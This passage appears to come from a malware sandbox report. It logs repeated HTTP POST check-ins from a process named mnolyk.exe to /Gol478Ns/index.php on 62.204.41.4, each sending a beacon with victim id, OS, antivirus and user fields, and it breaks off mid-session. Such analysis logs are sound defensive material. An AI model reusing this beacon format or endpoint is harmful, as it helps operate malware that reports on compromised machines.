                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:59.854084015 CET554INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      44192.168.2.74973862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:12.270874977 CET148OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:12.334152937 CET148INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      440192.168.2.75013562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:00.033380032 CET555OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:00.097311020 CET555INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      441192.168.2.75013662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:00.282670021 CET556OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:00.346760988 CET556INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      442192.168.2.75013762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:00.524988890 CET557OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:00.587641001 CET557INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      443192.168.2.75013862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:00.761131048 CET558OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:00.826219082 CET558INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      444192.168.2.75013962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:01.006926060 CET559OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:01.071893930 CET559INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      445192.168.2.75014062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:01.270108938 CET560OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:01.334685087 CET560INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      446192.168.2.75014162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:01.548249006 CET561OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:01.614281893 CET561INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      447192.168.2.75014262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:01.792841911 CET562OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:01.858047009 CET562INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      448192.168.2.75014362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:02.035666943 CET563OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:02.103218079 CET563INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      449192.168.2.75014462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:02.280525923 CET564OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:02.344717026 CET564INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      45192.168.2.74973962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:12.501528978 CET149OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:12.565644026 CET149INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      450192.168.2.75014562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:02.533585072 CET565OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:02.596209049 CET565INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      451192.168.2.75014662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:02.779772997 CET566OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:02.843532085 CET566INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      452192.168.2.75014762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:03.026189089 CET567OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:03.088977098 CET567INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      453192.168.2.75014862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:03.260796070 CET568OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:03.325751066 CET568INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      454192.168.2.75014962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:03.555506945 CET569OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:03.621136904 CET569INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      455192.168.2.75015062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:03.798727989 CET570OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:03.862282038 CET570INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      456192.168.2.75015162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:04.039199114 CET571OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:04.100732088 CET571INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
